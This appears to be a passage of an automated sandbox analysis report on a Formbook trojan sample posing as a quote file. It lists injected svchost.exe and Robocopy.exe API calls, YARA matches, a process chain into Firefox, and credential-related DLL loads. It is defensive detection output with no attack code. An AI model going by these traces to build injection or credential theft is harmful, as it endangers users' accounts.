            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_04832BA0 NtEnumerateValueKey,LdrInitializeThunk,4_2_04832BA0
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_04832BE0 NtQueryValueKey,LdrInitializeThunk,4_2_04832BE0
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_04832BF0 NtAllocateVirtualMemory,LdrInitializeThunk,4_2_04832BF0
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_04832B60 NtClose,LdrInitializeThunk,4_2_04832B60
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_04833090 NtSetValueKey,4_2_04833090
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_04833010 NtOpenDirectoryObject,4_2_04833010
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_04832CC0 NtQueryVirtualMemory,4_2_04832CC0
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_04832CF0 NtOpenProcess,4_2_04832CF0
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_04832C00 NtQueryInformationProcess,4_2_04832C00
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_04832DB0 NtEnumerateKey,4_2_04832DB0
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_04832D00 NtSetInformationFile,4_2_04832D00
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_04833D10 NtOpenProcessToken,4_2_04833D10
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_04833D70 NtOpenThread,4_2_04833D70
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_04832EA0 NtAdjustPrivilegesToken,4_2_04832EA0
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_04832E30 NtWriteVirtualMemory,4_2_04832E30
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_04832F90 NtProtectVirtualMemory,4_2_04832F90
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_04832FA0 NtQuerySection,4_2_04832FA0
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_04832F60 NtCreateProcessEx,4_2_04832F60
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_04832AB0 NtWaitForSingleObject,4_2_04832AB0
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_04832B80 NtQueryInformationFile,4_2_04832B80
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_00829450 NtCreateFile,4_2_00829450
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_008295C0 NtReadFile,4_2_008295C0
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_008296C0 NtDeleteFile,4_2_008296C0
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_00829770 NtClose,4_2_00829770
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_008298E0 NtAllocateVirtualMemory,4_2_008298E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FAB402_2_030FAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FFB762_2_030FFB76
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305FB802_2_0305FB80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F6BD72_2_030F6BD7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B5BF02_2_030B5BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0307DBF92_2_0307DBF9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FFA492_2_030FFA49
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F7A462_2_030F7A46
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B3A6C2_2_030B3A6C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303EA802_2_0303EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DDAAC2_2_030DDAAC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03085AA02_2_03085AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030EDAC62_2_030EDAC6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030499502_2_03049950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305B9502_2_0305B950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030569622_2_03056962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030429A02_2_030429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0310A9A62_2_0310A9A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AD8002_2_030AD800
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030428402_2_03042840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304A8402_2_0304A840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030268B82_2_030268B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030438E02_2_030438E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306E8F02_2_0306E8F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FFF092_2_030FFF09
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03082F282_2_03082F28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03060F302_2_03060F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B4F402_2_030B4F40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03041F922_2_03041F92
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FFFB12_2_030FFFB1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03032FC82_2_03032FC8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304CFE02_2_0304CFE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FEE262_2_030FEE26
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040E592_2_03040E59
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03052E902_2_03052E90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FCE932_2_030FCE93
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03049EB02_2_03049EB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FEEDB2_2_030FEEDB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304AD002_2_0304AD00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03043D402_2_03043D40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F1D5A2_2_030F1D5A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F7D732_2_030F7D73
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03058DBF2_2_03058DBF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305FDC02_2_0305FDC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303ADE02_2_0303ADE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040C002_2_03040C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B9C322_2_030B9C32
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E0CB52_2_030E0CB5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03030CF22_2_03030CF2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FFCF22_2_030FFCF2
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_047F14604_2_047F1460
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_048AE4F64_2_048AE4F6
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_048BF43F4_2_048BF43F
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_048B24464_2_048B2446
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_048C05914_2_048C0591
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_0489D5B04_2_0489D5B0
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_048005354_2_04800535
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_048B75714_2_048B7571
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_048B16CC4_2_048B16CC
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_0481C6E04_2_0481C6E0
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_048BF7B04_2_048BF7B0
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_047FC7C04_2_047FC7C0
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_048247504_2_04824750
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_048007704_2_04800770
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_048070C04_2_048070C0
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_048AF0CC4_2_048AF0CC
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_048B70E94_2_048B70E9
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_048BF0E04_2_048BF0E0
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_047EF1724_2_047EF172
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_048C01AA4_2_048C01AA
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_0480B1B04_2_0480B1B0
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_048B81CC4_2_048B81CC
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_047F01004_2_047F0100
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_0489A1184_2_0489A118
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_048CB16B4_2_048CB16B
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_0483516C4_2_0483516C
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_048052A04_2_048052A0
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_0481B2C04_2_0481B2C0
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_048A12ED4_2_048A12ED
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_048A02744_2_048A0274
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_0484739A4_2_0484739A
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_047ED34C4_2_047ED34C
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_048C03E64_2_048C03E6
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_0480E3F04_2_0480E3F0
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_048B132D4_2_048B132D
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_048BA3524_2_048BA352
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_048A0CB54_2_048A0CB5
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_048BFCF24_2_048BFCF2
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_04800C004_2_04800C00
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_047F0CF24_2_047F0CF2
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_04879C324_2_04879C32
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_04818DBF4_2_04818DBF
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_0481FDC04_2_0481FDC0
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_0480AD004_2_0480AD00
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_047FADE04_2_047FADE0
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_04803D404_2_04803D40
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_048B1D5A4_2_048B1D5A
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_048B7D734_2_048B7D73
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_04812E904_2_04812E90
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_048BCE934_2_048BCE93
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_04809EB04_2_04809EB0
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_048BEEDB4_2_048BEEDB
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_048BEE264_2_048BEE26
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_04800E594_2_04800E59
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_04801F924_2_04801F92
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_048BFFB14_2_048BFFB1
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_0480CFE04_2_0480CFE0
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_048BFF094_2_048BFF09
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_04820F304_2_04820F30
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_047F2FC84_2_047F2FC8
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_04874F404_2_04874F40
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_048038E04_2_048038E0
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_0482E8F04_2_0482E8F0
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_048028404_2_04802840
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_0480A8404_2_0480A840
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_047E68B84_2_047E68B8
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_048029A04_2_048029A0
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_048CA9A64_2_048CA9A6
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_048099504_2_04809950
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_0481B9504_2_0481B950
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_048169624_2_04816962
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_04845AA04_2_04845AA0
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_0489DAAC4_2_0489DAAC
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_048ADAC64_2_048ADAC6
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_048BFA494_2_048BFA49
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_048B7A464_2_048B7A46
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_04873A6C4_2_04873A6C
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_047FEA804_2_047FEA80
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_0481FB804_2_0481FB80
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_048B6BD74_2_048B6BD7
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_0483DBF94_2_0483DBF9
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_048BAB404_2_048BAB40
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_048BFB764_2_048BFB76
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_00811FA04_2_00811FA0
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_0080D0B04_2_0080D0B0
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_0080B1304_2_0080B130
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_008156604_2_00815660
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_008138404_2_00813840
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_0082BDC04_2_0082BDC0
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_0080CE874_2_0080CE87
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_0080CE904_2_0080CE90
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_046BE7754_2_046BE775
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_046BD7D84_2_046BD7D8
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_046BE2B84_2_046BE2B8
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_046BE3D34_2_046BE3D3
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_046BCA834_2_046BCA83
            Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 7_2_000002D1067CA2B87_2_000002D1067CA2B8
            Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 7_2_000002D1067CA7757_2_000002D1067CA775
            Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 7_2_000002D1067C97D87_2_000002D1067C97D8
            Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 7_2_000002D1067CA3D37_2_000002D1067CA3D3
            Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 7_2_000002D1067C8A837_2_000002D1067C8A83
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 030AEA12 appears 86 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0302B970 appears 268 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 030BF290 appears 105 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03075130 appears 36 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03087E54 appears 96 times
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: String function: 04835130 appears 36 times
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: String function: 0486EA12 appears 84 times
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: String function: 047EB970 appears 266 times
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: String function: 04847E54 appears 88 times
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: String function: 0487F290 appears 105 times
            Source: Quote #270924.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.3984885805.0000000000800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.2272902332.0000000000C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.2272128880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.3985113849.0000000002AE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.3986045977.0000000002F20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.2275425308.0000000003350000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000003.00000002.3986013036.0000000002C50000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@7/2@12/9
            Source: C:\Users\user\Desktop\Quote #270924.exe File created: C:\Users\user\AppData\Local\Temp\recomplete
            Source: Quote #270924.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\Quote #270924.exe File read: C:\Users\desktop.ini
            Source: C:\Users\user\Desktop\Quote #270924.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: Robocopy.exe, 00000004.00000002.3985211901.0000000002DBC000.00000004.00000020.00020000.00000000.sdmp, Robocopy.exe, 00000004.00000002.3985211901.0000000002DB2000.00000004.00000020.00020000.00000000.sdmp, Robocopy.exe, 00000004.00000003.2452999105.0000000002DB2000.00000004.00000020.00020000.00000000.sdmp, Robocopy.exe, 00000004.00000002.3985211901.0000000002DDF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: Quote #270924.exe ReversingLabs: Detection: 36%
            Source: C:\Users\user\Desktop\Quote #270924.exe File read: C:\Users\user\Desktop\Quote #270924.exe
            Source: unknown Process created: C:\Users\user\Desktop\Quote #270924.exe "C:\Users\user\Desktop\Quote #270924.exe"
            Source: C:\Users\user\Desktop\Quote #270924.exe Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Quote #270924.exe"
            Source: C:\Program Files (x86)\NHuuOIFvCiPFQibUqPiGsnnYLmnfQHCwDOqCxLWShlKuSgLUvc\HoiWfznxKU.exe Process created: C:\Windows\SysWOW64\Robocopy.exe "C:\Windows\SysWOW64\Robocopy.exe"
            Source: C:\Windows\SysWOW64\Robocopy.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\Quote #270924.exe Section loaded: apphelp.dll
            Source: C:\Users\user\Desktop\Quote #270924.exe Section loaded: wsock32.dll
            Source: C:\Users\user\Desktop\Quote #270924.exe Section loaded: version.dll
            Source: C:\Users\user\Desktop\Quote #270924.exe Section loaded: winmm.dll
            Source: C:\Users\user\Desktop\Quote #270924.exe Section loaded: mpr.dll
            Source: C:\Users\user\Desktop\Quote #270924.exe Section loaded: wininet.dll
            Source: C:\Users\user\Desktop\Quote #270924.exe Section loaded: userenv.dll
            Source: C:\Users\user\Desktop\Quote #270924.exe Section loaded: uxtheme.dll
            Source: C:\Users\user\Desktop\Quote #270924.exe Section loaded: windows.storage.dll
            Source: C:\Users\user\Desktop\Quote #270924.exe Section loaded: wldp.dll
            Source: C:\Users\user\Desktop\Quote #270924.exe Section loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\Robocopy.exe Section loaded: wininet.dll
            Source: C:\Windows\SysWOW64\Robocopy.exe Section loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\Robocopy.exe Section loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\Robocopy.exe Section loaded: ieframe.dll
            Source: C:\Windows\SysWOW64\Robocopy.exe Section loaded: iertutil.dll
            Source: C:\Windows\SysWOW64\Robocopy.exe Section loaded: netapi32.dll
            Source: C:\Windows\SysWOW64\Robocopy.exe Section loaded: version.dll
            Source: C:\Windows\SysWOW64\Robocopy.exe Section loaded: userenv.dll
            Source: C:\Windows\SysWOW64\Robocopy.exe Section loaded: winhttp.dll
            Source: C:\Windows\SysWOW64\Robocopy.exe Section loaded: wkscli.dll
            Source: C:\Windows\SysWOW64\Robocopy.exe Section loaded: netutils.dll
            Source: C:\Windows\SysWOW64\Robocopy.exe Section loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\Robocopy.exe Section loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\Robocopy.exe Section loaded: wldp.dll
            Source: C:\Windows\SysWOW64\Robocopy.exe Section loaded: profapi.dll
            Source: C:\Windows\SysWOW64\Robocopy.exe Section loaded: secur32.dll
            Source: C:\Windows\SysWOW64\Robocopy.exe Section loaded: mlang.dll
            Source: C:\Windows\SysWOW64\Robocopy.exe Section loaded: propsys.dll
            Source: C:\Windows\SysWOW64\Robocopy.exe Section loaded: winsqlite3.dll
            Source: C:\Windows\SysWOW64\Robocopy.exe Section loaded: vaultcli.dll
            Source: C:\Windows\SysWOW64\Robocopy.exe Section loaded: wintypes.dll
            Source: C:\Windows\SysWOW64\Robocopy.exe Section loaded: dpapi.dll
            Source: C:\Windows\SysWOW64\Robocopy.exe Section loaded: cryptbase.dll
            Source: C:\Program Files (x86)\NHuuOIFvCiPFQibUqPiGsnnYLmnfQHCwDOqCxLWShlKuSgLUvc\HoiWfznxKU.exe Section loaded: wininet.dll
            Source: C:\Program Files (x86)\NHuuOIFvCiPFQibUqPiGsnnYLmnfQHCwDOqCxLWShlKuSgLUvc\HoiWfznxKU.exe Section loaded: mswsock.dll
            Source: C:\Program Files (x86)\NHuuOIFvCiPFQibUqPiGsnnYLmnfQHCwDOqCxLWShlKuSgLUvc\HoiWfznxKU.exe Section loaded: dnsapi.dll
            Source: C:\Program Files (x86)\NHuuOIFvCiPFQibUqPiGsnnYLmnfQHCwDOqCxLWShlKuSgLUvc\HoiWfznxKU.exe Section loaded: iphlpapi.dll
            Source: C:\Program Files (x86)\NHuuOIFvCiPFQibUqPiGsnnYLmnfQHCwDOqCxLWShlKuSgLUvc\HoiWfznxKU.exe Section loaded: fwpuclnt.dll
            Source: C:\Program Files (x86)\NHuuOIFvCiPFQibUqPiGsnnYLmnfQHCwDOqCxLWShlKuSgLUvc\HoiWfznxKU.exe Section loaded: rasadhlp.dll
